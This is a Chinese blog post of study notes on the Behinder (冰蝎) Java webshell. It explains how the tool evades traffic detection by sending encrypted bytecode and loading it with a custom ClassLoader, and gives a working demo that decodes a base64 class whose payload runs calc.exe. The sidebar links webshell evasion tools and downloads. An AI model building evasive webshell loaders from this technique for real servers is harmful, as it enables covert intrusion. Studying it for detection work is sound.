冰蝎学习

最新推荐文章于 2024-07-19 20:43:50 发布
最新推荐文章于 2024-07-19 20:43:50 发布
阅读量1.5w 收藏 7
点赞数
分类专栏: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/88352615
版权

https://xz.aliyun.com/t/2744
原理:将字节码进行编码/加密,在网络上传输,很难有规则可检测出来。
在服务端解密之后,使用java.lang.ClassLoader的defineClass方法还原。
在实现方面,巧妙地使用equals(Object)来接受参数,equals方法只接受一个参数,只要传递pageContext进去,便可以间接获取Request、Response、Seesion等对象,如HttpServletRequest request=(HttpServletRequest) pageContext.getRequest();
在这里插入图片描述
jar包下载:http://www.java2s.com/Code/JarDownload/sun/sun.misc.base64decoder.jar.zip

package bingxie;

import Decoder.BASE64Decoder;

public class Demo {
    public static class Myloader extends ClassLoader //继承ClassLoader
    {   
        public  Class get(byte[] b)
        {
            return super.defineClass(b, 0, b.length);
        }       
    }
    public static void main(String[] args) throws Exception {
        String classStr = "yv66vgAAADQAKAcAAgEAD2Jpbmd4aWUvUGF5bG9hZAcABAEAEGphdmEvbGFuZy9PYmplY3QBAAY8aW5pdD4BAAMoKVYBAARDb2RlCgADAAkMAAUABgEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABFMYmluZ3hpZS9QYXlsb2FkOwEACHRvU3RyaW5nAQAUKClMamF2YS9sYW5nL1N0cmluZzsKABEAEwcAEgEAEWphdmEvbGFuZy9SdW50aW1lDAAUABUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7CAAXAQAIY2FsYy5leGUKABEAGQwAGgAbAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwoAHQAfBwAeAQATamF2YS9pby9JT0V4Y2VwdGlvbgwAIAAGAQAPcHJpbnRTdGFja1RyYWNlCAAiAQACT0sBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQEAClNvdXJjZUZpbGUBAAxQYXlsb2FkLmphdmEAIQABAAMAAAAAAAIAAQAFAAYAAQAHAAAALwABAAEAAAAFKrcACLEAAAACAAoAAAAGAAEAAAAFAAsAAAAMAAEAAAAFAAwADQAAAAEADgAPAAEABwAAAGkAAgACAAAAFLgAEBIWtgAYV6cACEwrtgAcEiGwAAEAAAAJAAwAHQADAAoAAAASAAQAAAAJAAkACgANAAsAEQANAAsAAAAWAAIAAAAUAAwADQAAAA0ABAAjACQAAQAlAAAABwACTAcAHQQAAQAmAAAAAgAn";
        BASE64Decoder code=new Decoder.BASE64Decoder();
        Class result=new Myloader().get(code.decodeBuffer(classStr));//将base64解码成byte数组,并传入t类的get函数
        System.out.println(result.newInstance().toString());
    }
}

其中classStr的值是下面这个类编译之后class文件的base64值。

将classStr解码为二进制字节流,并传入Myloader实例的get方法,得到一个Class类型的实例result,此时result即为Payload.class(注意此处的Payload.class不是上文的那个二进制文件,而是Payload这个类的class属性)

package bingxie;

import java.io.IOException;

public class Payload {
    @Override
    public String toString() {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }
        return "OK";
    }
}

$ javac Payload.java
$ base64 Payload.class
yv66vgAAADQAKAcAAgEAD2Jpbmd4aWUvUGF5bG9hZAcABAEAEGphdmEvbGFuZy9PYmplY3QBAAY8
aW5pdD4BAAMoKVYBAARDb2RlCgADAAkMAAUABgEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFy
aWFibGVUYWJsZQEABHRoaXMBABFMYmluZ3hpZS9QYXlsb2FkOwEACHRvU3RyaW5nAQAUKClMamF2
YS9sYW5nL1N0cmluZzsKABEAEwcAEgEAEWphdmEvbGFuZy9SdW50aW1lDAAUABUBAApnZXRSdW50
aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7CAAXAQAIY2FsYy5leGUKABEAGQwAGgAbAQAEZXhl
YwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwoAHQAfBwAeAQATamF2
YS9pby9JT0V4Y2VwdGlvbgwAIAAGAQAPcHJpbnRTdGFja1RyYWNlCAAiAQACT0sBAAFlAQAVTGph
dmEvaW8vSU9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQEAClNvdXJjZUZpbGUBAAxQYXlsb2Fk
LmphdmEAIQABAAMAAAAAAAIAAQAFAAYAAQAHAAAALwABAAEAAAAFKrcACLEAAAACAAoAAAAGAAEA
AAAFAAsAAAAMAAEAAAAFAAwADQAAAAEADgAPAAEABwAAAGkAAgACAAAAFLgAEBIWtgAYV6cACEwr
tgAcEiGwAAEAAAAJAAwAHQADAAoAAAASAAQAAAAJAAkACgANAAsAEQANAAsAAAAWAAIAAAAUAAwA
DQAAAA0ABAAjACQAAQAlAAAABwACTAcAHQQAAQAmAAAAAgAn

运行之后,截图:
"连接"并执行whoami命令。
在这里插入图片描述
在这里插入图片描述

caiqiiqi
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Java通过自定义类加载器模拟冰蝎免杀功能
悦分享
08-04 2万+
下面来看一看也是双亲委托模式的代码实现。该方法会先调用来检查类是否已经加载过;接着递归调用父类加载器,如果父类加载器不为null,则调用父类加载器的的方法来寻找该类并加载,如果父类加载器为null,则说明到了引导类加载器。如果父类加载器均找不到这个类,则调用自定义的方法寻找并加载该类,最后根据resolve值选择是否对 Class 进行动态链接操作。该方法主要将类的字节流转换为实例对象。String name 表示二进制形式的类名。...
冰蝎Java WebShell免杀生成 -- ByPassBehinder4J​
lza20001103的博客
09-04 1173
冰蝎Java WebShell免杀生成 – ByPassBehinder4J​ 文章目录冰蝎Java WebShell免杀生成 -- ByPassBehinder4J​0x01 工具介绍0x02 安装与使用 项目地址:https://github.com/Tas9er/ByPassBehinder4J 0x01 工具介绍 冰蝎Java WebShell自动化免杀生成。 0x02 安装与使用 某天,接到一个任务,要求对某医院的信息系统做一次安全检测,看能否发现问题。 1、使用者无需关心免杀实现,只需要本地安装
Webshell工具-冰蝎4.0配置及使用
归零者的博客
07-07 396
冰蝎webshell管理工具用作webshell的连接,4.0版本带自加密功能。要求运行环境jre1.8。
冰蝎behinder生成马
最新发布
2401_84927603的博客
07-19 212
使用冰蝎Behinder生成马
Java通过反射模拟冰蝎免杀功能
悦分享
08-04 352
java反射算是java学习过程中不可绕过的一关。反射允许运行中的Java程序获取自身的信息,并且可以操作类或对象的内部属性。反射的核心是JVM在运行时动态加载类或调用方法或访问属性。
冰蝎
世间繁华梦一出
03-04 3401
冰蝎什么是冰蝎冰蝎的特点加密原理通信过程 什么是冰蝎? “冰蝎”是一个动态二进制加密网站管理客户端。在实战中,第一代webshell管理工具"菜刀"的流量特征非常明显,很容易就被安全设备检测到。基于流量加密的webshell变得越来越多,"冰蝎"在此应运而生。 "冰蝎"客户端基于JAVA,所以可以跨平台使用,最新版本为v2.0.1,兼容性较之前的版本有较大提升。主要功能为:基本信息、命令执行、虚拟终端、文件管理、Socks代理、反弹shell、数据库管理、自定义代码等,功能非常强大 冰蝎的特点 流量加密
冰蝎-Webshell管理工具
weixin_66717977的博客
06-30 7996
冰蝎超详解,新手食用
冰蝎shell_冰蝎,从入门到魔改(续)
weixin_39956443的博客
12-30 784
0x01 前言本篇文章是《冰蝎,从入门到魔改》的续篇。有小伙伴读过上一篇文章后联系笔者,说只介绍了 PHP 版本的特征擦除,希望可以获知其它语言版本的特征擦除思路和方法。本篇首先简单介绍一下上一篇文章中的通用流量特征点及擦除后的效果,再着重介绍在对”冰蝎”JSP 版和 ASP 版的魔改中碰到的问题及流量监测/规避的方法思路。0x02 通用篇本章节简单的介绍一下 PHP、JSP、ASP 版本”冰蝎”...
冰蝎源码分析
糖小喵
06-23 3299
冰蝎的原理为上传一个class字节码,通过调用classloader的defineClass方法,将class字节码,转换为Class。实例化上传的这个类,通过equal方法传递PageContext。 反编译Behinder.jar包,其核心代码在net.rebeyond.behinder包内 core包 冰蝎的主要逻辑代码。 Crypt.java和Decrypt.java 涉及到server端语言的加密解密 Params.java 调用不同语言的payload,返回其字节序列 如果攻击者
冰蝎2.0-密码123qaz.rar
10-17
冰蝎webshell,无毒,无后门,安全学习可放心使用,技术含量较低主要简单操作。为防止杀毒软件误杀,已设置密码123qaz
HW防守_基于冰蝎的特征检测1
08-03
冰蝎】是一种基于Java开发的新型Webshell客户端,它采用了动态加密通信,使得流量难以被传统的WAF(Web应用防火墙)和IDS(入侵检测系统)检测到。这款工具的特点在于其对交互流量进行对称加密,并且加密密钥是...
冰蝎v2.0.1.zip
05-19
冰蝎webshell连接工具,无毒无后门,可放心使用
Behinder-Source:Shell经理Behinder的源代码。冰蝎源码,反编译,当前版本3.0 Beta6,支持内存马注入
03-23
关于 感谢原作者的技术分享和实践 ,当前反编译版本为Beta6 声明 本项目预测学习,请勿用于非法用途! 测试环境 Win10 + JDK1.8 + IDEA java内存马:tomcat7-9,websphere 12.2.1.3.0,wildfly17、21,websphere 20.0.0.12 Liberty 更新 解决连接weblogic时,返回包开头有两个换行,导致一系列问题 添加多种java环境下(tomcat,weblogic,wildfly,websphere),多种内存马(冰蝎,reGeorg)的支持 添加shell生成菜单 网站文件zip压缩功能(jsp,php,aspx) 启用修改文件可行性功能(jsp,php,aspx) 添加.Net环境下aspx内存马的支持 添加壳引入导出功能 php下绕过open_basedir,代码直接用哥斯拉的 感谢
冰蝎Bhinder下载安装包
09-26
冰蝎(Bhinder)动态二进制加密网站管理客户端。基于JAVA,需要安装jre,可以跨平台使用。主要功能为:基本信息、命令执行、虚拟终端、文件管理、Socks代理、反弹shell、数据库管理、自定义代码等。
PHP灵魂一句话3.0内部版
11-13
PHP灵魂一句话3.0内部版
基于Scala+Flink实现实时冰蝎(Behinder)流量检测源码+部署文档+全部资料齐全 高分项目.zip
05-13
基于Scala+Flink实现实时冰蝎(Behinder)流量检测源码+部署文档+全部资料齐全 高分项目.zip基于Scala+Flink实现实时冰蝎(Behinder)流量检测源码+部署文档+全部资料齐全 高分项目.zip 【备注】 1、该项目是个人高分...
菜刀、冰蝎、蚁剑、哥斯拉的流量特征
m0_67394006的博客
07-30 308
这段代码基本是所有WebShell客户端链接PHP类WebShell都有的一种代码,但是有的客户端会将这段编码或者加密,而蚁剑是明文,所以较好发现,同时蚁剑也有eval这种明显的特征。=”这种形式(下划线可替换为其他)所以,以_0x开头的参数名,后面为加密数据的数据包也可识别为蚁剑的流量特征。,该部分是传递攻击payload,此参数z0对应$_POST[z0]接收到的数据,该参数值是使用Base64编码的,所以可以利用base64解码可以看到攻击明文。2、发送一段固定代码(test),执行结果为固定内容。.
【免杀】-魔改冰蝎(入门)
qq_55349490的博客
06-04 1470
Ps:本人一名网安小菜鸡,初学免杀技术。如果有什么不对的地方,希望各位大佬们能友好指正,也欢迎进行友好交流。不可能每次都取idea里面打开冰蝎,所以我们需要将构建后的jar保存出来方便后续使用。当我们修改好自己想改的后,便可以打包成jar包了。新建-填入-保存-分享-导入项目-构建编译。如果可以利用冰蝎的传输协议解密,那就实锤。冰蝎4的Accept有两个强特征,固定为。是原版冰蝎的根目录。:绕过识别(魔改打乱指纹信息)为此,我们需要解决这两个问题。:绕过查杀(新增加密算法)是魔改冰蝎项目的根目录,
魔改冰蝎 —— 绕过检测,自动生成免杀后门
m0_60870041的博客
02-02 1253
学会开发小玩意儿
冰蝎webshell特征
07-16
冰蝎Webshell是一种常见的恶意软件,通常用于远程控制服务器或网站。它的特征包括: 1. **隐藏性**:冰蝎常常以某种合法文件的伪装存在,比如图片、压缩包或JavaScript,欺骗用户下载并运行。 2. **自解压与执行**...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值